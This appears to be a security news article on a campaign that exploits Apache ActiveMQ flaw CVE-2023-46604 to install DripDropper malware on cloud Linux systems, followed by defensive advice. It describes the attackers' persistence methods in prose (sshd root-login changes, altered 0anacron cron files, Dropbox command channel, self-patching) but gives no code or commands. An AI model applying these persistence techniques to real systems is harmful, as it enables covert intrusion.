Cybersecurity experts at Red Canary have discovered that hacker groups are exploiting a critical vulnerability in Apache ActiveMQ—a flaw that has remained unpatched in many environments for nearly two years—to gain persistent access to cloud-based Linux systems. Their goal: to install a new and sophisticated malware called DripDropper, designed to download additional threats onto the compromised system.
And if that weren't alarming enough, the attackers did something unusual: after exploiting the flaw, they patched it themselves. Why? To ensure that no other malicious groups could use the same backdoor, thereby maintaining exclusive and discreet access for a longer period of time.
The flaw in question is CVE-2023-46604, a critical vulnerability with a CVSS score of 10.0—the highest severity rating. This vulnerability allows remote code execution (RCE), meaning attackers can run commands directly on affected systems without needing authentication.
Although an official patch was released in October 2023, many organizations have yet to update their servers. This has opened the door to a wave of attacks by various groups, who are using the gap to deploy a range of dangerous malware in Linux environments, including:
HelloKitty, a ransomware family known for its destructive attacks.
Linux rootkits, designed to hide processes and maintain persistence undetected.
GoTitan, a botnet written in Go capable of remotely controlling systems.
Godzilla, a web shell that allows attackers to move laterally within compromised networks.
Once attackers gain access to the system, their next step is to secure full control. To do this, they modify the sshd service configurations and enable root access, granting them elevated privileges and complete command over the system. Among other things, this allows them to easily remove DripDropper, an ELF binary packed with PyInstaller—a common tool for distributing Python applications as executables.
This malware is not just a simple downloader. It has several features designed to remain undetected and resist analysis:
It requires a password to execute, making it harder for researchers and automated analysis tools to investigate.
It connects to Dropbox accounts controlled by the attackers to receive commands and download additional malware.
It deploys two main files: one that handles Dropbox communication and process monitoring, and another that modifies system configurations to maintain persistence.
One of DripDropper's most effective tricks is its ability to stay on the system even after reboots or cleanup attempts. To achieve this, it modifies the 0anacron file in several key cron directories:
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
This ensures it runs on a regular basis over time, using scheduled tasks that often go unnoticed.
The second file deployed by DripDropper stays in contact with Dropbox, receiving new instructions and reapplying SSH configurations if it detects any changes. In other words, if you try to block it, it reinstalls or reconfigures itself.
Read more: PipeMagic: The Trojan Exploiting Windows Flaws to Deploy Ransomware
One of the most curious—and concerning—details of this campaign is that the attackers themselves are patching the ActiveMQ vulnerability (CVE-2023-46604) after exploiting it. Why? To ensure that no one else can use the same backdoor they already control.
They apply these patches by downloading components from Apache Maven, effectively blocking future intrusions via that route—without affecting their already established access. Since they have other persistence methods in place (such as cron tasks and modified configurations), they no longer need to exploit the original flaw.
This campaign serves as a clear reminder of how important it is to stay vigilant about cybersecurity. Here are some key recommendations to strengthen your infrastructure's security:
Apply patches as soon as possible. Many current threats take advantage of known vulnerabilities that already have available fixes. By updating in time, you shut the door before attackers can walk in.
Restrict access to internal services. Use IP whitelisting, VPNs, or other access control methods to ensure only authorized users can reach sensitive services.
Monitor your cloud logs. Good visibility is critical. Regularly review your logs and look for patterns or unusual behaviors that could signal an intrusion before the damage escalates.
DripDropper is malware crafted with intelligence and precision. It doesn’t just infect—it adapts, hides, and ensures its persistence, all while maintaining constant communication with the attackers through legitimate services like Dropbox.
This type of threat highlights the importance not only of keeping systems updated but also of continuously monitoring key configurations and unusual behaviors.